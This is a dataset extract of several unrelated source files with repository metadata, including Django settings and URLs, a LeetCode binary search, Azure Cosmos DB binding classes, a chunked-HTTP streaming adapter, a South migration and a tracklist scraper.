MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Agenda.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Agenda.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Araguaina'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
STATIC_URL = '/static/'
|
[
"jvmoreno99@gmail.com"
] |
jvmoreno99@gmail.com
|
da2a8a45dfcd2377d5023092202df8631ca25576
|
06b46b09d0055c155a536137e3dd68e03f205799
|
/35. Search Insert Position/BinarySearch.py
|
a5457e3cceeee027c33dc916c7bb2f1678275c15
|
[] |
no_license
|
Amyoyoyo/LeetCode
|
89a469c9c02bb74415eec4850444468e813b5662
|
66f739c3cf1d3ecc5267de3b07081893024b7272
|
refs/heads/master
| 2020-07-06T08:25:43.414994
| 2019-08-25T11:39:17
| 2019-08-25T11:39:17
| 202,954,885
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 732
|
py
|
class Solution(object):
    def searchInsert(self, nums, target):
        """Return the index at which *target* is found in the sorted list
        *nums*, or the index where it would be inserted to keep the list
        sorted (classic lower-bound binary search).

        Fix over the original: an empty *nums* now returns 0 instead of
        raising IndexError on ``nums[len(nums) - 1]``.
        """
        # Fast path: target belongs past the end (also covers empty input).
        if not nums or nums[-1] < target:
            return len(nums)
        left = 0
        right = len(nums) - 1
        # Invariant: the answer index always lies within [left, right].
        while left < right:
            mid = left + (right - left) // 2
            if nums[mid] < target:
                left = mid + 1
            else:
                right = mid
        return left
'''
Runtime: 32 ms, faster than 86.48% of Python online submissions for Search Insert Position.
Memory Usage: 12.3 MB, less than 56.14% of Python online submissions for Search Insert Position.
'''
if __name__ == '__main__':
    # Smoke test: 4 would be inserted at index 2 in [1, 3, 5, 6].
    print(Solution().searchInsert([1, 3, 5, 6], 4))
|
[
"2929081453@qq.com"
] |
2929081453@qq.com
|
0a153aa851b34fa7e47730638bf43b10d4f5b386
|
163e851e35b1c7cf61051ad111f5928ce72ded0a
|
/azure/functions/decorators/cosmosdb.py
|
d9a281e838f7cddad93240c49b99aea891d58560
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Azure/azure-functions-python-library
|
b410ae8c6103cdabdd790fecd55f0c945321ca01
|
88f96d360458a62a2139d1b9f60cffa6f7783bbe
|
refs/heads/dev
| 2023-08-28T12:49:45.754018
| 2023-08-10T16:05:01
| 2023-08-10T16:05:01
| 136,426,082
| 118
| 51
|
MIT
| 2023-08-31T22:57:29
| 2018-06-07T05:29:14
|
Python
|
UTF-8
|
Python
| false
| false
| 9,264
|
py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from datetime import time
from typing import Optional, Union
from azure.functions.decorators.constants import COSMOS_DB, COSMOS_DB_TRIGGER
from azure.functions.decorators.core import DataType, InputBinding, \
OutputBinding, Trigger
# Used by cosmos_db_input_v3
class CosmosDBInputV3(InputBinding):
    """Cosmos DB input binding using the v3 extension schema
    (collection/connection-string based attribute names)."""
    @staticmethod
    def get_binding_name() -> str:
        # Binding-type string written into function.json.
        return COSMOS_DB
    def __init__(self,
                 name: str,
                 database_name: str,
                 collection_name: str,
                 connection_string_setting: str,
                 data_type: Optional[DataType] = None,
                 id: Optional[str] = None,
                 sql_query: Optional[str] = None,
                 partition_key: Optional[str] = None,
                 **kwargs):
        # NOTE: ``id`` shadows the builtin; kept because the binding
        # schema uses that exact property name.
        self.database_name = database_name
        self.collection_name = collection_name
        self.connection_string_setting = connection_string_setting
        self.partition_key = partition_key
        self.id = id
        self.sql_query = sql_query
        super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_output_v3
class CosmosDBOutputV3(OutputBinding):
    """Cosmos DB output binding using the v3 extension schema
    (collection/connection-string based attribute names)."""
    @staticmethod
    def get_binding_name() -> str:
        # Binding-type string written into function.json.
        return COSMOS_DB
    def __init__(self,
                 name: str,
                 database_name: str,
                 collection_name: str,
                 connection_string_setting: str,
                 create_if_not_exists: Optional[bool] = None,
                 collection_throughput: Optional[int] = None,
                 use_multiple_write_locations: Optional[bool] = None,
                 preferred_locations: Optional[str] = None,
                 partition_key: Optional[str] = None,
                 data_type: Optional[DataType] = None,
                 **kwargs):
        self.database_name = database_name
        self.collection_name = collection_name
        self.connection_string_setting = connection_string_setting
        self.create_if_not_exists = create_if_not_exists
        self.partition_key = partition_key
        self.collection_throughput = collection_throughput
        self.use_multiple_write_locations = use_multiple_write_locations
        self.preferred_locations = preferred_locations
        super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_trigger_v3 (original comment said "output" — fixed)
class CosmosDBTriggerV3(Trigger):
    """Cosmos DB change-feed trigger using the v3 extension schema.

    The lease_* parameters configure the auxiliary lease collection the
    change-feed processor uses to coordinate checkpoints.
    """
    @staticmethod
    def get_binding_name() -> str:
        # Binding-type string written into function.json.
        return COSMOS_DB_TRIGGER
    def __init__(self,
                 name: str,
                 database_name: str,
                 collection_name: str,
                 connection_string_setting: str,
                 leases_collection_throughput: Optional[int] = None,
                 checkpoint_interval: Optional[int] = None,
                 checkpoint_document_count: Optional[int] = None,
                 feed_poll_delay: Optional[int] = None,
                 lease_renew_interval: Optional[int] = None,
                 lease_acquire_interval: Optional[int] = None,
                 lease_expiration_interval: Optional[int] = None,
                 max_items_per_invocation: Optional[int] = None,
                 start_from_beginning: Optional[bool] = None,
                 create_lease_collection_if_not_exists: Optional[bool] = None,
                 preferred_locations: Optional[str] = None,
                 data_type: Optional[Union[DataType]] = None,
                 lease_collection_name: Optional[str] = None,
                 lease_connection_string_setting: Optional[str] = None,
                 lease_database_name: Optional[str] = None,
                 lease_collection_prefix: Optional[str] = None,
                 **kwargs):
        # NOTE(review): Optional[Union[DataType]] is equivalent to
        # Optional[DataType]; kept as-is to avoid touching the signature.
        self.lease_collection_name = lease_collection_name
        self.lease_connection_string_setting = lease_connection_string_setting
        self.lease_database_name = lease_database_name
        self.create_lease_collection_if_not_exists = \
            create_lease_collection_if_not_exists
        self.leases_collection_throughput = leases_collection_throughput
        self.lease_collection_prefix = lease_collection_prefix
        self.checkpoint_interval = checkpoint_interval
        self.checkpoint_document_count = checkpoint_document_count
        self.feed_poll_delay = feed_poll_delay
        self.lease_renew_interval = lease_renew_interval
        self.lease_acquire_interval = lease_acquire_interval
        self.lease_expiration_interval = lease_expiration_interval
        self.max_items_per_invocation = max_items_per_invocation
        self.start_from_beginning = start_from_beginning
        self.preferred_locations = preferred_locations
        self.connection_string_setting = connection_string_setting
        self.database_name = database_name
        self.collection_name = collection_name
        super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_input
class CosmosDBInput(InputBinding):
    """Cosmos DB input binding using the current extension schema
    (container/connection based attribute names)."""
    @staticmethod
    def get_binding_name() -> str:
        # Binding-type string written into function.json.
        return COSMOS_DB
    def __init__(self,
                 name: str,
                 connection: str,
                 database_name: str,
                 container_name: str,
                 partition_key: Optional[str] = None,
                 data_type: Optional[DataType] = None,
                 id: Optional[str] = None,
                 sql_query: Optional[str] = None,
                 preferred_locations: Optional[str] = None,
                 **kwargs):
        # NOTE: ``id`` shadows the builtin; kept to match the binding schema.
        self.database_name = database_name
        self.container_name = container_name
        self.connection = connection
        self.partition_key = partition_key
        self.id = id
        self.sql_query = sql_query
        self.preferred_locations = preferred_locations
        super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_output
class CosmosDBOutput(OutputBinding):
    """Cosmos DB output binding using the current extension schema
    (container/connection based attribute names)."""
    @staticmethod
    def get_binding_name() -> str:
        # Binding-type string written into function.json.
        return COSMOS_DB
    def __init__(self,
                 name: str,
                 connection: str,
                 database_name: str,
                 container_name: str,
                 create_if_not_exists: Optional[bool] = None,
                 partition_key: Optional[str] = None,
                 container_throughput: Optional[int] = None,
                 preferred_locations: Optional[str] = None,
                 data_type: Optional[DataType] = None,
                 **kwargs):
        self.connection = connection
        self.database_name = database_name
        self.container_name = container_name
        self.create_if_not_exists = create_if_not_exists
        self.partition_key = partition_key
        self.container_throughput = container_throughput
        self.preferred_locations = preferred_locations
        super().__init__(name=name, data_type=data_type)
# Used by cosmos_db_trigger
class CosmosDBTrigger(Trigger):
    """Cosmos DB change-feed trigger using the current extension schema
    (container/connection based attribute names)."""
    @staticmethod
    def get_binding_name() -> str:
        # Binding-type string written into function.json.
        return COSMOS_DB_TRIGGER
    def __init__(self,
                 name: str,
                 connection: str,
                 database_name: str,
                 container_name: str,
                 lease_connection: Optional[str] = None,
                 lease_database_name: Optional[str] = None,
                 lease_container_name: Optional[str] = None,
                 create_lease_container_if_not_exists: Optional[
                     bool] = None,
                 leases_container_throughput: Optional[int] = None,
                 lease_container_prefix: Optional[str] = None,
                 feed_poll_delay: Optional[int] = None,
                 lease_acquire_interval: Optional[int] = None,
                 lease_expiration_interval: Optional[int] = None,
                 lease_renew_interval: Optional[int] = None,
                 max_items_per_invocation: Optional[int] = None,
                 start_from_beginning: Optional[time] = None,
                 start_from_time: Optional[time] = None,
                 preferred_locations: Optional[str] = None,
                 data_type: Optional[Union[DataType]] = None,
                 **kwargs):
        # NOTE(review): start_from_beginning is annotated Optional[time]
        # here but Optional[bool] in CosmosDBTriggerV3 — looks like a typo
        # in the annotation; confirm before changing (runtime unaffected).
        self.connection = connection
        self.database_name = database_name
        self.container_name = container_name
        self.lease_connection = lease_connection
        self.lease_database_name = lease_database_name
        self.lease_container_name = lease_container_name
        self.create_lease_container_if_not_exists = \
            create_lease_container_if_not_exists
        self.leases_container_throughput = leases_container_throughput
        self.lease_container_prefix = lease_container_prefix
        self.feed_poll_delay = feed_poll_delay
        self.lease_acquire_interval = lease_acquire_interval
        self.lease_expiration_interval = lease_expiration_interval
        self.lease_renew_interval = lease_renew_interval
        self.max_items_per_invocation = max_items_per_invocation
        self.start_from_beginning = start_from_beginning
        self.start_from_time = start_from_time
        self.preferred_locations = preferred_locations
        super().__init__(name=name, data_type=data_type)
|
[
"noreply@github.com"
] |
Azure.noreply@github.com
|
621a7d4cf7d438dce2c1005eca31a958674e1786
|
2369be86c388e6a0d8bdaeeec17374213f39a30d
|
/kuankr_utils/requests.py
|
d92ec3c7620c2a50eabbef0a2d21e9583aa191d5
|
[] |
no_license
|
kkyt/kuankr-utils-py
|
9ac3df53e6fc27575cee5e8a2e71c0b91269b44c
|
fc14b8d06c9436313b7ac4e3e407cadaf6dafa70
|
refs/heads/master
| 2020-03-28T03:59:58.488061
| 2018-09-08T06:49:10
| 2018-09-08T06:49:10
| 147,688,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,950
|
py
|
#coding: utf8
#http://mihai.ibanescu.net/chunked-encoding-and-python-requests
from __future__ import absolute_import
import httplib
import requests
#from requests.adapters import HTTPAdapter, TimeoutSauce
from requests.adapters import *
from requests.adapters import _ProxyError, _HTTPError, _SSLError
import sys
def response_hook(response, *args, **kwargs):
    """Requests response hook: attach an ``iter_chunks`` method to the
    response that streams raw HTTP chunks from the underlying httplib
    response object, then return the response unchanged."""
    def _iter(amt=None):
        return iter_chunks(response.raw._fp, amt=amt)
    response.iter_chunks = _iter
    return response
def iter_chunks(response, amt=None):
    """
    A copy-paste version of httplib.HTTPConnection._read_chunked() that
    yields chunks served by the server.

    ``response`` is a low-level httplib response object; ``amt`` is the
    read size used only on the non-chunked fallback path.

    NOTE(review): in the ``except ValueError`` branch below, ``chunk_size``
    is unbound if the very first chunk-size line is malformed, which would
    raise UnboundLocalError instead of IncompleteRead — confirm intent
    before fixing (httplib's original passes the partial body instead).
    """
    if response.chunked:
        while True:
            # Each chunk starts with "<hex size>[;extensions]\r\n".
            line = response.fp.readline().strip()
            arr = line.split(';', 1)
            try:
                chunk_size = int(arr[0], 16)
            except ValueError:
                response.close()
                raise httplib.IncompleteRead(chunk_size)
            if chunk_size == 0:
                break
            value = response._safe_read(chunk_size)
            yield value
            # we read the whole chunk, get another
            response._safe_read(2) # toss the CRLF at the end of the chunk
        # read and discard trailer up to the CRLF terminator
        ### note: we shouldn't have any trailers!
        while True:
            line = response.fp.readline()
            if not line:
                # a vanishingly small number of sites EOF without
                # sending the trailer
                break
            if line == '\r\n':
                break
        # we read everything; close the "file"
        response.close()
    else:
        # Non-chunked response. If amt is None, then just drop back to
        # response.read()
        if amt is None:
            r = response.read()
            #NOTE: don't yield empty chunk
            if r:
                yield r
        else:
            # Yield chunks as read from the HTTP connection
            while True:
                ret = response.read(amt)
                if not ret:
                    break
                yield ret
class HTTPStreamAdapter(HTTPAdapter):
    """Transport adapter that uploads a chunked request body lazily.

    When the request has a body but no Content-Length header, the body
    iterable is written to the socket from a gevent greenlet using
    chunked transfer encoding, so the response can be consumed while the
    upload is still in progress (live/streaming requests).
    """
    def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
        # gevent imported lazily so the module is importable without it
        # when only the non-chunked path is exercised.
        import gevent
        conn = self.get_connection(request.url, proxies)
        self.cert_verify(conn, request.url, verify, cert)
        url = self.request_url(request, proxies)
        self.add_headers(request)
        # Chunked iff there IS a body but no explicit Content-Length.
        chunked = not (request.body is None or 'Content-Length' in request.headers)
        timeout = TimeoutSauce(connect=timeout, read=timeout)
        try:
            if not chunked:
                # Standard path: delegate entirely to urllib3.
                resp = conn.urlopen(
                    method=request.method,
                    url=url,
                    body=request.body,
                    headers=request.headers,
                    redirect=False,
                    assert_same_host=False,
                    preload_content=False,
                    decode_content=False,
                    retries=self.max_retries,
                    timeout=timeout
                )
            # Send the request.
            else:
                if hasattr(conn, 'proxy_pool'):
                    conn = conn.proxy_pool
                low_conn = conn._get_conn(timeout=timeout)
                try:
                    low_conn.putrequest(request.method,
                                        url,
                                        skip_accept_encoding=True)
                    for header, value in request.headers.items():
                        low_conn.putheader(header, value)
                    low_conn.endheaders()
                    # Body writer: emits "<hex len>\r\n<data>\r\n" per item,
                    # terminated by the zero-length chunk "0\r\n\r\n".
                    def send_body():
                        for i in request.body:
                            low_conn.send(hex(len(i))[2:].encode('utf-8'))
                            low_conn.send(b'\r\n')
                            low_conn.send(i)
                            low_conn.send(b'\r\n')
                            #must sleep to make streams LIVE
                            gevent.sleep(0)
                        low_conn.send(b'0\r\n\r\n')
                    # Upload runs concurrently; getresponse() below can
                    # return while send_body() is still writing.
                    gevent.spawn(send_body)
                    r = low_conn.getresponse()
                    resp = HTTPResponse.from_httplib(
                        r,
                        pool=conn,
                        connection=low_conn,
                        preload_content=False,
                        decode_content=False
                    )
                except:
                    # If we hit any problems here, clean up the connection.
                    # Then, reraise so that we can handle the actual exception.
                    low_conn.close()
                    raise
                else:
                    # All is well, return the connection to the pool.
                    conn._put_conn(low_conn)
        except socket.error as sockerr:
            raise ConnectionError(sockerr, request=request)
        except MaxRetryError as e:
            raise ConnectionError(e, request=request)
        except _ProxyError as e:
            raise ProxyError(e)
        except (_SSLError, _HTTPError) as e:
            if isinstance(e, _SSLError):
                raise SSLError(e, request=request)
            elif isinstance(e, TimeoutError):
                raise Timeout(e, request=request)
            else:
                raise
        return self.build_response(request, resp)
"""
def main():
if len(sys.argv) != 2:
print "Usage: %s " % sys.argv[0]
return 1
headers = { 'Accept-Encoding' : 'identity' }
sess = requests.sessions.Session()
sess.headers.update(headers)
sess.verify = False
sess.prefetch = False
sess.hooks.update(response=response_hook)
resp = sess.get(sys.argv[1])
cb = lambda x: sys.stdout.write("Read: %s\n" % x)
for chunk in resp.iter_chunks():
cb(chunk)
"""
|
[
"zbo@agutong.com"
] |
zbo@agutong.com
|
5e769130e09ec9c853cb962ae512aa792a97cbac
|
21b6a178306cd7293f883a3de7b3c8c2a0bebf8f
|
/socialpakt_site/catalog/migrations/0005_auto__add_field_product_cart_title__add_field_product_call_to_action.py
|
9a221cbc728a660b70e848beecfb966d7449a973
|
[] |
no_license
|
kdoran/socialpaktgithub
|
ec20d13a99da23d228dd1b238668130712984c4b
|
07729e61dc45e4e0136d941698e035deabd3c839
|
HEAD
| 2016-09-07T18:54:27.371106
| 2012-10-31T23:42:09
| 2012-10-31T23:42:09
| 4,531,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,081
|
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: adds ``cart_title`` and ``call_to_action``
    CharFields to catalog.Product. The ``models`` dict below is a frozen
    ORM snapshot generated by South — do not edit it by hand."""
    def forwards(self, orm):
        # Adding field 'Product.cart_title'
        db.add_column('catalog_product', 'cart_title', self.gf('django.db.models.fields.CharField')(default="This week's shirt", max_length=255), keep_default=False)
        # Adding field 'Product.call_to_action'
        db.add_column('catalog_product', 'call_to_action', self.gf('django.db.models.fields.CharField')(default='', max_length=255), keep_default=False)
    def backwards(self, orm):
        # Deleting field 'Product.cart_title'
        db.delete_column('catalog_product', 'cart_title')
        # Deleting field 'Product.call_to_action'
        db.delete_column('catalog_product', 'call_to_action')
    models = {
        'catalog.product': {
            'Meta': {'object_name': 'Product'},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'artist': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'artist_on_set'", 'to': "orm['partners.Partner']"}),
            'benefits': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'benefits_from_set'", 'to': "orm['partners.Partner']"}),
            'call_to_action': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
            'cart_title': ('django.db.models.fields.CharField', [], {'default': '"This week\'s shirt"', 'max_length': '255'}),
            'date_expires': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {}),
            'donation_amount': ('django.db.models.fields.FloatField', [], {'default': '6.0'}),
            'goal': ('django.db.models.fields.FloatField', [], {'default': '1200.0'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'price': ('django.db.models.fields.FloatField', [], {}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'total_sold': ('django.db.models.fields.IntegerField', [], {'default': '0'})
        },
        'catalog.productphoto': {
            'Meta': {'object_name': 'ProductPhoto'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
            'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"})
        },
        'catalog.productvariation': {
            'Meta': {'object_name': 'ProductVariation'},
            'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'num_ordered': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"})
        },
        'partners.partner': {
            'Meta': {'object_name': 'Partner'},
            'about': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'partner_type': ('django.db.models.fields.CharField', [], {'max_length': '3', 'db_index': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'})
        }
    }
    complete_apps = ['catalog']
|
[
"jonloyens@gmail.com"
] |
jonloyens@gmail.com
|
9effecf143f76a28be0210b64b7faccd8b6fe30c
|
a255de3418235f77bc1f381fb015093b054c09d5
|
/src/Object.py
|
49fa50e665f16227d35788d357af8284cb96e49a
|
[] |
no_license
|
returnEdo/plotPorn
|
4878e297029ea2ea75dbe1352434120a88bad139
|
33ccaad0ef74a3391a86f23e2f4813967da549cc
|
refs/heads/master
| 2023-01-12T06:01:58.782662
| 2020-11-18T10:40:38
| 2020-11-18T10:40:38
| 313,704,256
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,267
|
py
|
#! /usr/bin/env python3
import Matrix2
import Vector2
import Camera
import typing
''' The rendering pipeline is something like:
1) update positions and other stuff
2) update all the vertices of the Object.Object
3) update window dimension
4) compute the screen coordinates
5) render the object '''
class Object:
    """Base class for drawable 2D objects; concrete shapes override
    render() and updateVertices() (see the pipeline description above)."""
    def __init__(self, position: typing.Optional[Vector2.Vector2] = None):
        # Bug fix: the original signature used `position=Vector2.Vector2()`,
        # which is evaluated once at class-definition time, so every object
        # created without an explicit position shared the SAME (mutable)
        # vector. A fresh vector is now created per instance; callers that
        # pass an explicit position are unaffected.
        if position is None:
            position = Vector2.Vector2()
        self.position: Vector2.Vector2 = position  # relative position of the cg
        self.color: typing.List[float] = [1.0, 1.0, 1.0]  # color of the object
        self.movable: bool = True
        self.vertices: typing.List[Vector2.Vector2] = []  # object-local vertices
        self.globalVertices: typing.List[Vector2.Vector2] = []  # world-space vertices
    def __str__(self): return "Object"
    def render(self, Mcp: Matrix2.Matrix2,  # Camera to pixel matrix
               Mps: Matrix2.Matrix2,  # Pixel to screen matrix
               Mcs: Matrix2.Matrix2,  # Camera to screen matrix
               camPosition: Vector2.Vector2) -> None:
        ''' Draws on screen the position of an object
        globalPosition is a list of Vector2 '''
        pass
    def updateVertices(self) -> None:
        ''' Update all the vertices of an object. Has to be used prior to
        the computation of the screen coordinates '''
        pass
|
[
"fraccaroedo@gmail.com"
] |
fraccaroedo@gmail.com
|
930ac4430e0cc68c97951ad0f248b08823559803
|
d6a40780e5e0f2a1e8f456e2cb70e79c015e6831
|
/TracklistScraper/tracklist.py
|
34efce7b8ea77890825ee03c0d050175c3e12bc7
|
[] |
no_license
|
jennynzhuang/LiveToPlay
|
60efd8a5f3b9a770bb543243312138a4a37c11da
|
22be1ab28b68c39ec069363ef6d4d32b32aab3d6
|
refs/heads/main
| 2023-07-11T06:56:50.797086
| 2021-08-20T09:17:27
| 2021-08-20T09:17:27
| 398,218,684
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,599
|
py
|
from TracklistScraper.scraper import *
import re # for regular expressions
import json
# full title
# title
# music label
# artists
class Tracks:
    """One track parsed from a tracklist entry of the form
    'artist1 ft. artist2 - title ...'.

    NOTE(review): the title/label parsing splits on a plain space, yet
    search_track_query() strips '\xa0' (non-breaking space) from the
    title — the original separator may have been a special character
    lost in transit; confirm against real scraped input.
    """
    def __init__(self, track_content):
        # set full content
        self.full_title = track_content
        split = track_content.split(" - ")
        # Normalize featuring/versus credits into a single '&'-separated list.
        artists = split[0].replace('ft.', '&').replace('vs.', '&').split("&")
        # set title of song
        self.title = split[1].split(" ")[0]
        # set label of song
        if(len(split[1].split(" ")) > 1):
            if(split[1].split(" ")[1].strip() != ""):
                self.label = split[1].split(" ")[1].title().strip()
            else:
                self.label = "NONE"
        else:
            self.label = "NONE"
        # set artists
        self.artists = [a.strip() for a in artists]
    def search_track_query(self):
        # Unreleased/unidentified tracks ('ID') cannot be searched.
        if(self.title.strip() == 'ID'):
            return ''
        # add artist query
        query = 'artist:' + ' AND '.join(self.artists)
        # add track name
        query = query + ' track:' + self.title.replace('\xa0', ' ')
        return query
    def trackJSON(self):
        # Serialize the parsed fields (not the raw full_title) to JSON.
        data = {}
        data["title"] = self.title
        data["label"] = self.label
        data["artists"] = self.artists
        return json.dumps(data)
    def __repr__(self):
        return self.full_title.strip()
# url
# title
# artists
# content
# performance_type
# performance_length
# tracks (list)
# num tracks -- includes IDs (but ids are not in the tracks)
# date
# genres
class Tracklists:
    """A scraped tracklist page: metadata plus a list of Tracks.

    ``num_tracks`` comes from the page's own counter and includes 'ID'
    (unidentified) entries, so it may exceed len(self.tracks)' usable
    entries.
    """
    def __init__(self, url):
        # use scraper and get html content from url
        soup = get_soup(url);
        # set attributes
        self.url = url
        self.title = soup.find("title").get_text()
        authors = soup.find_all("meta", {"itemprop": "author"})
        # First author meta tag is skipped — presumably the site itself;
        # verify against the page markup.
        authors = authors[1:]
        self.artists = [a['content'] for a in authors]
        self.content = soup.find("meta", {"property": "og:description"})['content']
        # og:description is comma-separated: type, ?, length, genres...
        content_split = self.content.split(',')
        self.performance_type = content_split[0]
        self.performance_length = content_split[2]
        self.genres = content_split[3:]
        self.num_tracks = soup.find("meta", {"itemprop": "numTracks"})['content'];
        tracks = soup.find_all("div", attrs={"class": "fontL", "itemprop": "tracks"})
        self.tracks = [Tracks(t.get_text()) for t in tracks]
    def tracklistJSON(self):
        # Serialize the whole tracklist, embedding each track's JSON.
        data = {}
        data['url'] = self.url
        data['title'] = self.title
        data['artists'] = self.artists
        data['content'] = self.content
        data['performance_type'] = self.performance_type
        data['length'] = self.performance_length
        data['genres'] = self.genres
        data['numtracks'] = self.num_tracks
        data['tracks'] = [json.loads(track.trackJSON()) for track in self.tracks]
        return json.dumps(data, indent=4)
    def __repr__(self):
        return self.content
|
[
"noreply@github.com"
] |
jennynzhuang.noreply@github.com
|
4b6e23837721840cee9e64560e25ec4ff77634c4
|
57d99d5a02ccb6b43b4b71810e2df991b9d918ae
|
/web_telemoveis/manage.py
|
f4ad78685a130ae05f1335382b90b0a30fac5d16
|
[] |
no_license
|
danny2911pt/web_telemoveis
|
9e53a73cf63a0516592f8d15a4d80e10293d77d0
|
14df9057595a5f3bdf0d020e0da058fde5ef34f2
|
refs/heads/main
| 2023-03-31T06:46:26.019663
| 2021-04-12T18:34:36
| 2021-04-12T18:34:36
| 356,938,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 670
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Django management entry point: select the project settings module
    and hand argv over to Django's command-line machinery."""
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'web_telemoveis.settings')
    try:
        from django.core.management import execute_from_command_line as run_cli
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    run_cli(sys.argv)
if __name__ == '__main__':
    main()
|
[
"daniel.rocha@cgi.com"
] |
daniel.rocha@cgi.com
|
c2bcd28ad63365f380d600ef243f2ceea15941f5
|
5f52330247d61e7479c09a9bf28f5b72b26c3e5f
|
/account/urls.py
|
7af3fb2946ba4bc12d8f85649db810618f6c6378
|
[] |
no_license
|
Not-Menezes/academia_project
|
f7bf4def9fc6b56ceada667a069c7d6f7d772df9
|
db548519cd9b6a8dc8c66513381b9dd8966cb74e
|
refs/heads/main
| 2023-01-19T15:07:40.285331
| 2020-12-03T00:55:18
| 2020-12-03T00:55:18
| 312,699,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 853
|
py
|
from django.urls import path
from . import views
# URL routes for the account app: auth pages, role dashboards, and
# class CRUD operations (pk is passed as a string and resolved in views).
urlpatterns = [
    # NOTE(review): both '' and 'home/' are registered under name="home";
    # reverse('home') resolves to only one of them — confirm this is intended.
    path('', views.home, name="home"),
    path('register/', views.registerPage, name="register"),
    path('login/', views.loginPage, name="login"),
    path('logout/', views.logoutUser, name="logout"),
    path('home/', views.home, name="home"),
    path('dashboard_professor/', views.dashboard_professor, name="dashboard_professor"),
    path('dashboard_student/', views.dashboard_student, name="dashboard_student"),
    path('create_class/', views.create_class, name='create_class'),
    path('add_class/<str:pk>/', views.add_class, name='add_class'),
    path('remove_class/<str:pk>/', views.remove_class, name='remove_class'),
    path('update_class/<str:pk>/', views.update_class, name='update_class'),
    path('delete_class/<str:pk>/', views.delete_class, name="delete_class"),
]
|
[
"newton.coelho@bigdatacorp.com.br"
] |
newton.coelho@bigdatacorp.com.br
|
f39e391d33f69bc01d7114aa04a5836a8245fe29
|
9422e86e84f0726e956fd8942736564088394506
|
/lib/networks/Resnet101_train.py
|
92b6b748de5a13618db8a6a8e69c0c87e86e0260
|
[
"MIT"
] |
permissive
|
joyeuxni/MIFNet
|
8a090be7fdc375b2129a21c0559ef5511bb1f609
|
3b1e1f56d549bb2d105e9782c2b327b2f7d7d089
|
refs/heads/master
| 2020-12-01T03:16:45.921041
| 2020-10-19T09:31:22
| 2020-10-19T09:31:22
| 230,546,982
| 1
| 0
| null | null | null | null |
UTF-8
|
